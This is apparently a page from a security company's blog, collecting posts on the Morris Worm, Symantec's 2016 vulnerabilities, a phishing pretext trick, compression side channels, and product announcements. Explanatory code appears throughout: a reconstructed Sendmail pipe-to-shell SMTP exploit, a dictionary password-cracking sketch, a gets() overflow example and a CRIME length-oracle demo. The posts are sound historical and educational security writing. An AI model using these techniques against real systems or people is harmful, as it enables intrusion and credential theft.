A tale of two worms, three vulnerabilities, and one National Security Agency

By Max Veytsman | August 24, 2016 on vihkal, security

Paranoia is natural for security practitioners.

Hacking can feel like being initiated into a secret society of wizards. Once you’re in, you get access to an addictive drug that gives you super powers. But there are other wizards out there; some are good but many practice black magic. And the NSA’s school of the dark arts has a seemingly unlimited budget.

It’s natural to get a little paranoid. Experience shows you that with the right incantation you can turn crashes into working exploits. It follows that every time your computer crashes there could be someone in the shadows, chanting the right incantation. The paranoia can be all-consuming; just because you’re paranoid doesn’t mean they’re not out to get you.

In October 2013, a well-known computer security expert named Dragos Ruiu came out with a story. His computers had been behaving oddly, and the symptoms he was seeing were impossible to eradicate. It had to be some kind of worm, since the behavior replicated across air-gapped computers in his lab. He theorized that he was infected with a super-advanced piece of malware that lived in the BIOS and could spread by sending ultrasonic frequencies from speaker to microphone, undetectable to the human ear. It looked like the work of the NSA or someone equally omnipotent. He dubbed it badBIOS.

Everything Dragos claimed badBIOS could do is at least possible, and most security folks know this. Malware in the BIOS is feasible; beyond being a research topic, it’s something we know the NSA does. In fact, in the wake of the hype, several people built ultrasonic networking libraries just to demonstrate how viable that part is.

Dragos Ruiu imaged his computer and made a lot of data available to the community for peer review, but unfortunately no credible researcher[1] has publicly confirmed his findings. Maybe there was something going on. Maybe he was seeing patterns in the noise. Either way, it says something about the world today that when you’re a security expert and your computer starts behaving weirdly, the obvious culprit is the NSA.

It made me think of a different worm, from a more innocent time.

The Morris Worm

It’s November 2nd, 1988, almost exactly 25 years before badBIOS became a hashtag. Robert Tappan Morris, a graduate student at Cornell, executes some code he’d been working on and goes to dinner. The aftermath was a self-replicating computer worm that infected 10% of the Internet[2] at the time — a whopping 6,000 computers!

Morris claimed that he wrote his program to map the size of the Internet. And indeed, each infection would send a byte to a machine in Berkeley (obscuring the trail back to Morris at Cornell). Unfortunately, a bug caused it to propagate too aggressively: it infected the same computer multiple times, which amounted to a denial-of-service attack across the whole Internet. Furthermore, the code to report infections was itself broken — it tried to send a UDP packet over a TCP socket, making it useless for measuring the Internet’s size.

An alternative explanation is that Morris was trying to bring wider attention to some long-standing bugs in the Internet. As Morris’ friend and future co-founder put it, in classic pg[3] style:

Mr. Graham, who has known the younger Mr. Morris for several years, compared his exploit to that of Mathias Rust, the young German who flew a light plane through Soviet air defenses in May 1987 and landed in Moscow.

“It’s as if Mathias Rust had not just flown into Red Square, but built himself a stealth bomber by hand and then flown into Red Square,” he said.

What did the Morris Worm actually do?

The Morris Worm[4] exploited three separate vulnerabilities. It guessed passwords for rsh/rexec, it exploited a debug-mode backdoor in Sendmail, and it used “one very neat trick”. I’ll go over each of these in detail; you can find an archive (decompiled and commented) of the code for yourself here.

1. Rsh and Rexec

rsh and rexec are remote shell protocols from the BSD era that are almost unused today (they’ve since been supplanted by ssh). rsh allows passwordless authentication for requests coming from a “trusted” host, which it determines via a list of addresses stored in the global /etc/hosts.equiv or a per-user .rhosts file. When an rsh request comes from a user on a trusted machine, access is automatically granted. The worm used this to propagate, searching those two files — as well as the .forward file, which back then was used to forward your mail around the Internet — for trusted hosts.
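For illustration, a per-user .rhosts file was just hostname (and optionally username) entries, one per line — the names here are hypothetical:

trusted.cs.example.edu alice
lab-vax.example.edu

Any rsh connection claiming to be alice coming from trusted.cs.example.edu got a shell with no password asked, so every entry the worm harvested was a fresh propagation target.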

Even in 1988, people knew that leaving rsh open on an untrusted network like the Internet was a Bad Idea, and so the worm also propagated via rexec. Now, rexec uses password authentication, but Morris made an intelligent assumption: people tend to reuse passwords. Back then, the world-readable /etc/passwd used to[5] store everyone’s encrypted passwords. The worm shipped with an optimized implementation of crypt and a dictionary, and went to town. Once it cracked a password, it tried it against all the likely hosts it could find.
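The core of that attack fits in a few lines. Here’s a minimal sketch in modern C — the hash and wordlist below are made up, and the worm shipped its own optimized crypt rather than calling libc’s:

/* Dictionary attack against a DES-crypt hash lifted from a
   world-readable /etc/passwd. Sketch only: the target hash and
   wordlist are hypothetical. Compile with: cc crack.c -lcrypt */
#include <stdio.h>
#include <string.h>
#include <crypt.h>   /* on some systems crypt() is declared in <unistd.h> */

int main(void) {
    const char *target = "abJnggxhB/yWI";   /* made-up hash field */
    const char *words[] = { "password", "wizard", "cornell", NULL };
    char salt[3] = { target[0], target[1], '\0' };   /* first two chars */

    for (int i = 0; words[i]; i++) {
        const char *h = crypt(words[i], salt);
        if (h && strcmp(h, target) == 0) {
            printf("cracked: %s\n", words[i]);
            return 0;
        }
    }
    printf("no luck; the worm would move on to the next account\n");
    return 1;
}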

2. Sendmail’s Backdoor

In the absence of any friendly hosts, the Morris Worm would then exploit a backdoor in Sendmail. You see, Sendmail had a “debug” mode that allowed anyone to route an email to any process, including the shell! Ironically, this was apparently deliberate:

Eric Allman, a computer programmer who designed the mail program that Morris exploited, said yesterday that he created the back door to allow him to fine tune the program on a machine that an overzealous administrator would not give him access to. He said he forgot to remove the entry point before the program was widely distributed in 1985.
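The exploit itself needed nothing more than an SMTP conversation. Roughly — this is a reconstruction based on contemporary analyses of the worm, not a verbatim capture — a session looked like this:

debug
mail from: </dev/null>
rcpt to: <"| sed '1,/^$/d' | /bin/sh ; exit 0">
data
cd /usr/tmp
... commands to pull over and compile the worm's bootstrap ...
.
quit

With debug mode on, the recipient could be a command pipeline instead of a mailbox: the sed strips off the mail headers, and everything after the blank line lands in a shell on the target.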

(This wasn’t even the first Sendmail backdoor. Sendmail used to ship with “wizard mode”, where sending the strings “WIZ” and “SHELL” gave you a root shell. By the time that Morris was writing his worm, wizard mode was disabled almost everywhere.)

If you’re wondering how Sendmail could have backdoors like this, it seems that it was somewhat well known. This excerpt from a Usenet post by Paul Vixie summarizes the situation:

From: vixie@decwrl.dec.com (Paul Vixie)
Newsgroups: comp.protocols.tcp-ip,comp.unix.wizards
Subject: Re: a holiday gift from Robert "wormer" Morris
Message-ID: <24@jove.dec.com>
Date: 6 Nov 88 19:36:10 GMT
References: <1698@cadre.dsl.PITTSBURGH.EDU> <2060@spdcc.COM>
Distribution: na
Organization: DEC Western Research Lab
Lines: 15


# the hole [in sendmail] was so obvious that i surmise that Morris
# was not the only one to discover it.  perhaps other less
# reproductively minded arpanetters have been having a field
# 'day' ever since this bsd release happened. 

I've known about it for a long time.  I thought it was common knowledge
and that the Internet was just a darned polite place.  (I think it _was_
common knowledge among the people who like to diddle the sendmail source.)

The bug in fingerd was a big surprise, though.  Overwriting a stack frame
on a remote machine with executable code is One Very Neat Trick.
-- 
Paul Vixie
Work:    vixie@decwrl.dec.com    decwrl!vixie    +1 415 853 6600
Play:    paul@vixie.sf.ca.us     vixie!paul      +1 415 864 7013

The Internet was a polite place, indeed.

3. One Very Neat Trick

The Very Neat Trick that Vixie was talking about is the now-standard stack buffer overflow. It’s fascinating to read contemporary accounts that marvel at the cleverness of a class of bugs that are now ubiquitous — although, for me at least, they still haven’t lost their magic[6].

Here’s the main routine from the fingerd of that era:

main(argc, argv)
    char *argv[];
{
    register char *sp;
    char line[512];
    struct sockaddr_in sin;
    int i, p[2], pid, status;
    FILE *fp;
    char *av[4];

    i = sizeof (sin);
    if (getpeername(0, &sin, &i) < 0)
        fatal(argv[0], "getpeername");
    line[0] = '\0';
    gets(line);
    sp = line;
    // ... snip ...
    // build sp into arguments for finger 
    // and call /usr/ucb/finger via execv before
    // putchar'ing the result back to stdout
    return(0);
} 

If you have experience reading C code,[7] you may have spotted the vulnerability. gets(line) reads from stdin and puts the contents into a 512-byte buffer, with no bounds check whatsoever. This means that sending more than 512 bytes will overwrite adjacent stack memory with attacker-controlled data.

The worm sent 536 bytes of data, which overwrote the stack frame of the main function — including the saved return address. Morris pointed that return address back into the 536-byte buffer he had sent over the network, the beginning of which contained shellcode that called /bin/sh. Game over.
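The bug class hasn’t changed in three decades. Here’s a minimal sketch of the same mistake in modern C — don’t run it anywhere you care about, and note that compilers now complain loudly about gets for exactly this reason:

#include <stdio.h>

/* C11 removed gets from stdio.h, but libc still ships the symbol,
   so we declare it ourselves to make the point. */
char *gets(char *);

int main(void) {
    char line[512];   /* fixed-size stack buffer, just like fingerd's */

    /* gets() reads until newline and has no idea how big `line` is.
       Everything past byte 512 lands on whatever sits above the buffer:
       saved registers, the frame pointer, and the return address. */
    gets(line);

    printf("read: %s\n", line);
    return 0;
}

Feed it 536 carefully chosen bytes and the last few replace the saved return address — which is exactly where the worm pointed execution back into its own payload.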

Aftermath

Robert Tappan Morris was convicted and sentenced to three years’ probation, 400 hours of community service, and a $10,050 fine (about $20,000 in today’s dollars), plus the cost of his supervision. He then went on to co-found a little startup called Viaweb. You may have heard the rest of that story. Today, Morris is a tenured professor at MIT’s Computer Science and Artificial Intelligence Laboratory, where he is one of the leaders of the Parallel and Distributed Operating Systems group.

Why did the paranoia around badBIOS make me think of the Morris Worm? If you read contemporary articles about the Morris Worm, they’ll sometimes mention, but never emphasize, who Robert Morris’s father was. The elder Robert Morris just happened to be a computer security expert. While the young Robert Morris was writing his worm, Robert Morris Sr. was serving as Chief Scientist at the NSA’s National Computer Security Center!

The Internet has grown up a lot since 1988, and not just in size. In 2013, your computer acting strangely is obviously NSA-written malware that lives in your BIOS and propagates over sound waves imperceptible to the human ear. In 1988, the son of an NSA security executive infects 10% of the Internet with a worm that uses an exotic new exploitation technique called a buffer overflow and… nothing.

Just to be clear, I’m not alleging any conspiracy between father and son, beyond perhaps the father making some calls after his son’s arrest. While the Morris worm was likely the first malicious use, buffer overflows were understood as a problem before 1988, even if not widely. But the way the media narrative handled the NSA connection in 1988 says a lot about how the world of the Internet has changed in 25 years.

As for Dragos Ruiu, he’s been quiet about badBIOS since 2013. I’m not sure what he’s doing these days besides CanSecWest, but in my heart of hearts, I like to picture him playing the saxophone amidst the detritus of his torn-up apartment.


Paying the Bills

We’re trying our best, but we’ll only ever be able to blog about a minuscule percentage of the world’s vulnerabilities. And starting with 1988 means we have a lot of catching up to do. How will you ever find out about the ones that actually affect you?

Our product, Appcanary, monitors your apps and servers, and notifies you whenever a new vulnerability is discovered in a package you rely on.

Sign up today!



  1. One of the things I wish that the security industry would do less of is blind appeals to authority, and I hate that I made one here. Unfortunately, I don’t have the skills or time to make my own analysis of Ruiu’s data, so I just have to trust the Thought Leaders on this one.  

  2. The 60,000-computer-strong Internet was of course one of many networks at the time. The Internet was the one that was global and used TCP/IP — the Internet protocols. Therein lies the pedant’s case against the AP’s recent decision to stop capitalizing the word “Internet”.

  3. Disclosure time: years after giving that quote, Paul Graham and Robert Morris went on to found Y Combinator along with Jessica Livingston and Trevor Blackwell. YC in turn is an investor in Appcanary. Robert Morris and I have never met, though we did once meet with Paul Graham.  

  4. My favourite paper on the analysis of the worm is With Microscope and Tweezers from MIT’s Eichin and Rochlis. They spend a page passionately arguing that it’s a virus by using a complicated appeal to the difference between lytic and lysogenic viruses with references to three separate biology textbooks! 

  5. I assumed that /etc/shadow came about as a consequence of the Morris Worm, but it seems that it was originally implemented in SunOS earlier in the ’80s, and then took two years after the Morris Worm to make it into BSD.

  6. Exploits really are magic, and it goes without saying that exploit users have chosen the Left-Hand Path to wizardhood. If the cover of SICP is to be believed, the Right-Hand Path is available through careful study of functional programming and Lisps. Perhaps this is the true reason why Morris and Graham were such effective collaborators. 

  7. On the other hand, this C code is over 30 years old. When I ran it through gcc on my machine, I was very happy to see that it complained bitterly but still compiled it. One exercise for the reader is finding where the network operation actually happens. main takes input and output from STDIN/STDOUT, but there’s an uninitialized struct sockaddr_in sin that we call getpeername on. How is a network socket piped to standard input/output, and who is initializing the sin struct? I actually haven’t been able to figure this part out. If you know, please tell me! The full code listing is here.

    Update 08/29/2016 Dave Vandervies emailed me with an explanation!

    fingerd was meant to be run from inetd (see here), which sets up the network connection and invokes the actual server process with its stdin and stdout attached to the network socket.
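    For the curious, a classic inetd.conf entry for finger looked something like this (the path and user varied by system):

    finger  stream  tcp  nowait  nobody  /usr/etc/in.fingerd  in.fingerd

    inetd listens on the finger port itself and, for each connection, forks the listed program with the socket already wired up as stdin and stdout — which is why fingerd can just read from one and write to the other.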


    As for the getpeername, the address is an out parameter; this call looks up the peer address of stdin (fd 0), and will fail (and fingerd will error out on that) if it isn’t a socket (see here). Since the actual address doesn’t get used, that appears to be the purpose of the call here.


Making Appcanary easier to use

By Max Veytsman | July 14, 2016 on Announcements, Product

I’m excited to announce that we’ve added two features that make Appcanary a heck of a lot easier to use!

Add monitors by uploading a file

Our Monitor API is great if you want to track a set of Linux packages or your Gemfile. We give you a dashboard showing which packages are vulnerable, and email you whenever new vulnerabilities that affect you come out. However, there’s always a bunch of setup involved in getting going with an API.

With that in mind, we made the interface a lot more user-friendly! You can now upload a file to watch directly through the website. Just go to the add monitors page to upload a file directly. Monitors support Ruby’s Gemfile.lock, /var/lib/dpkg/status for Ubuntu and Debian, and the output of rpm -qa for CentOS and Amazon Linux!
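For example, on CentOS or Amazon Linux you could produce a file to upload like so (the file name is arbitrary):

rpm -qa > packages.txt

On Ubuntu or Debian, /var/lib/dpkg/status can be uploaded as-is.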

Automatically upgrade vulnerable packages

A few of our customers told us that knowing about vulnerabilities is nice, but you know what would be great? If we could somehow patch them automatically. We thought about it and said, sure, why not!

If you have the Appcanary agent installed on an Ubuntu server, and you’re running the latest version, you can run

appcanary upgrade

in order to install updates for any packages we know to be vulnerable.

You can also run

appcanary upgrade -dry-run

in order to see what the agent will do, without it actually touching your system.

Now you can manage vulnerabilities, learn about new ones that affect you, and apply patches, all through Appcanary!

If you haven’t tried us yet

Stay on top of the security vulnerabilities that affect you, today.

Appcanary monitors your apps and servers, and notifies you whenever a new vulnerability is discovered in a package you rely on. And now it will help you patch vulnerable packages as well.

Sign up today!


Vulnerabilities I Have Known and Loved #1: Symantec's Bad Week

By Max Veytsman | July 07, 2016 on vihkal, security

tl;dr: If you use software with “Symantec” or “Norton” somewhere in its name, stop what you’re doing and upgrade.

Back in my security consulting days, a mentor taught me One Weird Trick to increase conversions on your phishing campaign. It goes like this: set up an email server, get as many employee addresses as you can find, and spoof a mass message that reads:

Hello this is your boss.

I’m going to fire someone next week and you get to vote on who! To get your arch-nemesis fired, please log into this website that looks exactly like our company portal, but has one character in the domain name misspelled.

Thanks, Your Boss.

Then you sit back and count how many people fell for it.

The executive who hired you is happy because they get to demonstrate the value of increasing their security budget. The consultancy you work for is happy, because they get to upsell a bunch of “security awareness training”.

Soon, you’ll be spending three days telling your victims about the importance of that little green lock in their browser’s address bar (but only when it’s in the right place!) and that they should never ever click on links, never open attachments, and if at all possible, stop using computers altogether. Everybody wins.

Obviously, everyone at this stage wants to increase the conversion rate[1] of these phishing emails. This is where The One Weird Trick comes in: after you send out your first campaign, you craft another one. Before you know it, everyone on your list receives a helpful tip from the IT Helpdesk:

Hi,

We’ve heard reports of a phishing campaign being waged against us. Don’t open those emails! It’s critically important that you reset your password to protect against those evil hackers who tried to phish us.

Click here to do it!

It turns out that round two gets way more clicks than round one. Most people will figure out that email #1 is a little fishy. Email #2 confirms their suspicion — there really was a phishing campaign! — and so they dutifully click, like lambs to the slaughter.

This is the phishing equivalent of the Double Tap. No, not the one from Zombieland. The Double Tap I’m talking about is a controversial military technique where after attacking a target, you follow up by sending another missile at the first responders. You do some damage, and then attack the response to that damage.

Symantec is Having a Bad Week

Last week Tavis Ormandy dropped 8 vulns against every single Symantec/Norton antivirus product. Judging by the press, things are not looking good for them.

You can find a writeup on the Google Project Zero blog, and the issues for all 8 vulnerabilities can be found here. They’re all remotely exploitable,[2] and all of them should give an attacker remote code execution as root/SYSTEM (and, for one of them, in ring 0 to boot!)

If you’re using a Symantec product I can’t stress this enough: stop what you’re doing and upgrade.

These vulnerabilities reminded me of phishing and the Double Tap for two reasons. First, every one of these vulns can be exploited by just sending an email. Since the product is an antivirus, it’s going to scan every file that touches your disk and every email you get for viruses. You don’t have to get your target to click a link or even open the message you sent — Symantec will happily try to parse every email you receive.

Second, the stack overflow in Symantec’s PowerPoint parser depends on a Double Tap-like attack! The parser extracts metadata and macros from PowerPoint decks (and presumably scans them for known malware) through an I/O abstraction layer that caches file contents for performance. Tavis found that he could get that cache into a misaligned state, which resulted in the stack buffer overflow.

This vulnerable codepath is in something called “Bloodhound Heuristics”, which Symantec promotes as a more advanced set of malware detection checks. Since they’re not always run, you’d think the vulnerability wouldn’t be very exploitable. And yet, it can be targeted every time! Under the default configuration, the system dynamically decides which set of checks to run. All Tavis had to do was try a bunch of known PowerPoint malware, see which samples triggered the automatic mode to turn on “Bloodhound Heuristics,” and put his payload into those.

The exploit pretends to be a certain kind of known malware in order to trigger some special aggressive checks, which are the exploit’s true target. The Double Tap!

Vulnerability Management

While the above vulnerability is pretty cool, the Symantec bugs that are most interesting to us at Appcanary are CVE-2016-2207 and CVE-2016-2211.

Symantec was shipping its product with out-of-date versions of libmspack and unrarsrc — versions with dozens of known vulnerabilities and public exploits! All Tavis had to do was download public exploits for these known vulnerabilities, and he had an attack against Symantec.

Ironically, Symantec sells a product called Enterprise Vulnerability Management! Keeping track of vulnerable dependencies is a hard problem for everyone. At Appcanary, we’re working on solving it.

P.S.

Do you have suggestions for vulnerabilities you’d like me to write about? You can let me know at max@appcanary.com.


Paying the Bills

One quarter of the critical vulnerabilities found in Symantec’s products last week were there because they relied on out-of-date libraries with known security holes.

Our product, Appcanary, monitors your apps and servers, and notifies you whenever a new vulnerability is discovered in a package you rely on.

Sign up today!


  1. You know, it’s interesting: before I became the CEO of a startup, the only time in my career I’d thought about the “conversion rates” of emails was when I was running phishing campaigns.

  2. I’m going to well-actually myself here so you don’t have to. Tavis gives a clear path to exploit for 6 of the 8. Of the two that are left, one is a lack of bounds checking on an array index, and the other is an integer overflow bug. I’m going to go out on a limb and say I think both can lead to code execution. I can’t fault the researcher for not going further though; after you find the first 6 remote code executions, you stop feeling the need to keep proving the point… 


Should you encrypt or compress first?

By Max Veytsman | June 25, 2016 on security, crypto

Imagine this:

You work for a big company. Your job is pretty boring. Frankly, your talents are wasted writing boilerplate code for an application whose only users are three people in accounting who can’t stand the sight of you.

Your real passion is security. You read r/netsec every day and participate in bug bounties after work. For the past three months, you’ve been playing a baroque stock trading game that you’re winning because you found a heap-based buffer overflow and wrote some AVR shellcode to help you pick stocks.

Everything changes when you discover that what you had thought was a video game was actually a cleverly disguised recruitment tool. Mont Piper, the best security consultancy in the world, is hiring — and you just landed an interview!

A plane ride and an Uber later, you’re sitting across from your potential future boss: a slightly sweaty hacker named Gary in a Norwegian metal band t-shirt and sunglasses he refuses to take off indoors.

You blast through the first part of the interview. You give a great explanation of the difference between privacy and anonymity. You describe the same-origin policy in great detail, and give three ways an attacker can get around it. You even whiteboard the intricacies of __fastcall vs __stdcall. Finally, you arrive at the penultimate section: protocol security.

Gary looks you in the eyes and says: “You’re designing a network protocol. Do you compress the data and then encrypt it, or do you encrypt and then compress?” And then he clasps his hands together and smiles to himself.

A classic security interview question!


Take a second and think about it.

At a high level, compression tries to use patterns in data in order to reduce its size. Encryption tries to shuffle data in such a way that without the key, you can’t find any patterns in the data at all.

Encryption produces output that appears random: a jumble of bits with a lot of entropy. Compression doesn’t really work on data that appears random — entropy can actually be thought of as a measure of how compressible some data is.

So if you encrypt first, your compression will be useless. The answer must be to compress first! Even StackOverflow thinks so.
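You could check this yourself with a few lines of C against zlib — a minimal sketch, assuming zlib is installed (compile with cc entropy.c -lz):

/* Compress a low-entropy kilobyte and a random-looking one, and compare.
   Sketch only: rand() is a poor stand-in for ciphertext cryptographically,
   but it's plenty random from a compressor's point of view. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <zlib.h>

static unsigned long deflated_size(const unsigned char *src, unsigned long n) {
    uLongf out_len = compressBound(n);
    unsigned char *out = malloc(out_len);
    compress(out, &out_len, src, n);   /* zlib's one-shot deflate */
    free(out);
    return out_len;
}

int main(void) {
    unsigned char repetitive[1024], noisy[1024];
    memset(repetitive, 'A', sizeof repetitive);   /* very low entropy */
    for (size_t i = 0; i < sizeof noisy; i++)
        noisy[i] = (unsigned char)rand();         /* high entropy */

    printf("repetitive: 1024 -> %lu bytes\n",
           deflated_size(repetitive, sizeof repetitive));
    printf("noisy:      1024 -> %lu bytes\n",
           deflated_size(noisy, sizeof noisy));
    return 0;
}

The repetitive kilobyte shrinks to a couple dozen bytes; the random-looking one comes out slightly larger than it went in. Ciphertext looks like the second case, which is why encrypting first makes the compressor useless.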


You start to say this to Gary, but you stop mid-sentence. An attacker sniffing encrypted traffic doesn’t get much information, but they do get to learn the length of messages. If they can somehow use that to learn more information about the message, maybe they can foil the encryption.

You start explaining this to Gary, and he interrupts you — “Oh you mean like the CRIME attack?”

“Yes!” you reply. You start to recall the details. All the SSL attacks with catchy names are mixed together in your mind, but you’re pretty sure that’s the one. The attackers controlled some information that was being returned by the server, and used it to generate guesses for a secret token present in the response. The response was compressed in such a way that you could validate guesses for the secret by seeing how they affected the length of the compressed message. If the secret was AAAA and you guessed AAAA, the compressed-then-encrypted response would be shorter than if you guessed BBBB.
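That guess-checking loop is easy to demo with zlib’s one-shot API. Here’s a toy sketch of the length oracle — the cookie and guesses are made up, and the real CRIME attack targeted TLS/SPDY compression rather than strings in memory:

/* Toy CRIME-style length oracle. When the attacker's guess repeats a
   substring of the secret, DEFLATE encodes the repetition as a cheap
   back-reference and the compressed output shrinks. The secret and
   guesses are hypothetical. Compile with: cc crime.c -lz */
#include <stdio.h>
#include <string.h>
#include <zlib.h>

static unsigned long deflated_size(const char *s) {
    unsigned char out[256];
    uLongf out_len = sizeof out;
    compress(out, &out_len, (const unsigned char *)s, strlen(s));
    return out_len;
}

int main(void) {
    const char *guesses[] = { "sessionid=7fd1e0a2c4b9",     /* right guess */
                              "sessionid=q8w5e2r9t1y6" };   /* wrong guess */
    for (int i = 0; i < 2; i++) {
        char msg[160];
        /* attacker-controlled query string + the secret cookie,
           compressed together, like a CRIME-era HTTP request */
        snprintf(msg, sizeof msg,
                 "GET /?q=%s HTTP/1.1\r\nCookie: sessionid=7fd1e0a2c4b9\r\n",
                 guesses[i]);
        printf("%s -> %lu compressed bytes\n", guesses[i], deflated_size(msg));
    }
    return 0;
}

The right guess compresses noticeably smaller, because the compressor has already seen those bytes. That length difference survives encryption, and byte by byte, the secret falls out.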

Gary looks impressed. “But what if the attacker can’t control any of the plaintext in any way? Is this kind of attack still possible?” he asks.


CRIME was a very cool demonstration of how compress-then-encrypt isn’t always the right decision, but my favorite compress-then-encrypt attack was published a year earlier by Andrew M. White, Austin R. Matthews, Kevin Z. Snow, and Fabian Monrose. The paper Phonotactic Reconstruction of Encrypted VoIP Conversations gives a technique for reconstructing speech from an encrypted VoIP call.

Basically, the idea is this: VoIP compression isn’t going to be a generic audio compression algorithm, because we can rely on some assumptions about human speech in order to compress more efficiently. From the paper:

Many modern speech codecs are based on variants of a well-known speech coding scheme known as code-excited linear prediction (CELP) [49], which is in turn based on the source-filter model of speech prediction. The source-filter model separates the audio into two signals: the excitation or source signal, as produced by the vocal cords, and the shape or filter signal, which models the shaping of the sound performed by the vocal tract. This allows for differentiation of phonemes; for instance, vowels have a periodic excitation signal while fricatives (such as the [sh] and [f] sounds) have an excitation signal similar to white noise [53].

In basic CELP, the excitation signal is modeled as an entry from a fixed codebook (hence code-excited). In some CELP variants, such as Speex’s VBR (variable bit rate) mode, the codewords can be chosen from different codebooks depending on the complexity of the input frame; each codebook contains entries of a different size. The filter signal is modeled using linear prediction, i.e., as a so-called adaptive codebook where the codebook entries are linear combinations of past excitation signals. The “best” entries from each codebook are chosen by searching the space of possible codewords in order to “perceptually” optimize the output signal in a process known as analysis-by-synthesis [53]. Thus an encoded frame consists of a fixed codebook entry and gain (coefficient) for the excitation signal and the linear prediction coefficients for the filter signal.

Lastly, many VoIP providers (including Skype) use VBR codecs to minimize bandwidth usage while maintaining call quality. Under VBR, the size of the codebook entry, and thus the size of the encoded frame, can vary based on the complexity of the input frame. The specification for Secure RTP (SRTP) [3] does not alter the size of the original payload; thus encoded frame sizes are preserved across the cryptographic layer. The size of the encrypted packet therefore reflects properties of the input signal; it is exactly this correlation that our approach leverages to model phonemes as sequences of lengths of encrypted packets.

That pretty much summarizes the paper. CELP + VBR means that message length is going to depend on complexity. Due to how linear prediction works, more information is needed to encode a drastic change in sound — like the pause between phonemes! This allows the authors to build a model that breaks an encrypted audio stream into phonemes: that is, one that decides which audio frames belong to which unit of speech.
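As a cartoon of that first step — the real paper trains proper probabilistic models, and this crude threshold rule is only meant to make the idea concrete — treat the intercepted call as a sequence of packet lengths and guess a boundary wherever the length jumps:

/* Toy phoneme segmenter over encrypted-packet lengths. White et al. use
   trained models; this threshold rule is just an illustration of the idea
   that length jumps track changes in the underlying sound. */
#include <stdio.h>
#include <stdlib.h>

int main(void) {
    /* made-up frame sizes from a hypothetical VBR codec, in bytes */
    int len[] = { 38, 38, 40, 38, 62, 60, 61, 38, 38, 37, 59, 60 };
    int n = sizeof len / sizeof len[0];

    printf("guessed boundaries at frames: ");
    for (int i = 1; i < n; i++)
        if (abs(len[i] - len[i - 1]) > 10)   /* arbitrary jump threshold */
            printf("%d ", i);
    printf("\n");
    return 0;
}

Everything downstream — labeling the segments with phonemes, then snapping the phoneme stream to words — is where the paper’s real machinery lives, but none of it needs anything beyond those lengths.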

They then built a classifier that, still using only the packet-length information they started with, decides which segmented units of encrypted audio represent which actual phonemes. Finally, they used a language model to correct the previous step’s output and segment the phoneme stream into words and then phrases.

The crazy thing is that this whole rigmarole works! They used a metric called METEOR and got scores of around .6, on a scale where anything above .5 is considered “interpretable by a human.” Considering that the threat vector here is a human using this technique to listen in on your encrypted VoIP calls — that’s pretty amazing!


Epilogue

After passing the rigorous all-night culture fit screening, you end up getting the job. Six months later, Mont Piper is sold to a large conglomerate. Gary refuses to trade in his Norwegian metal t-shirts for a button-down and is summarily fired. You now spend your days going on-site to a big bank, “advising” a team that hates your guts.

But recently, you’ve picked up machine learning and found this really cool online game where you try to make a six-legged robot walk in a 3D physics simulation…



Paying the Bills

Vulnerabilities come out every day, and most don’t get blog posts like this written about them.

Our product, Appcanary, monitors your apps and servers, and notifies you whenever a new vulnerability is discovered in a package you rely on.

Sign up today!


Appcanary now supports Debian!

By Max Veytsman | June 24, 2016 on Announcements, Product

I’m excited to announce that Appcanary now fully supports Debian. If you install our agent on a Debian server, we will email you notifications whenever any package you have installed on your system has a known vulnerability. We track over 24,000 vulnerabilities already!

You can also use our Check API to verify if your Debian server has any vulnerable packages, and our Monitor API to register to receive notifications if a set of Debian packages ever has new vulnerabilities.

If you’re not a current user and want to try out Appcanary for Debian, you can sign up!

You can always let us know what you think at hello@appcanary.com.